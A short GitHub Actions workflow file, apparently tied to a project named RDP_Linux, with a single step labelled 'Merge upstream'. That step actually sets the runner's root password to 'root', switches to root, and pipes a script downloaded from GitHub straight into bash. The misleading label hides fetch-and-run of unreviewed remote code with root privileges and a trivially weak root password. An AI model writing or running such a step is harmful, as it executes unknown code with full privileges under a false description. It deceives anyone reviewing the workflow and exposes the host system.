name: rerun
on:
  workflow_dispatch:
jobs:
  trigger:
    runs-on: ubuntu-latest
    #if: ${{ github.event.workflow_run.conclusion != 'success' }}
    steps:
      - uses: actions/checkout@v2
        #with:
          #token: ${{ secrets.GH_TOKEN }}  #get_personnel_access_token https://github.com/settings/tokens
      - name: Merge upstream
        run: printf "root\nroot" | sudo passwd root && printf "root" | su - root -c " curl https://raw.githubusercontent.com/jha-ji/RDP_Linux/main/scripts/rerun | bash  " 
#
          
